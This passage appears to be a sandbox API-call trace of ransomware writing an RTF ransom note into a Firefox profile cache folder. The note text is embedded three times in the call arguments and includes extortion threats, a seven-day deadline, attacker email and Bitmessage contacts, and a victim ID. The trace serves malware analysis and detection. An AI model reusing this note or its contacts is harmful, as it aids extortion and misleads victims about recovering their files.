ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x87n\x02Èh\x06\x05c;¼ó\x19îºò,Ç3Ú´\x81\x16Á£\r", lpUsedDefaultChar=0x0) returned 8717 [0300.440] WriteFile (in: hFile=0x2d4, lpBuffer=0x38b3a68*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x38b3a68*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.441] CloseHandle (hObject=0x2d4) returned 1 [0300.441] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\#readme_eman#.rtf")) returned 0xffffffff [0300.441] GetLastError () returned 0x2 [0300.441] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.444] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 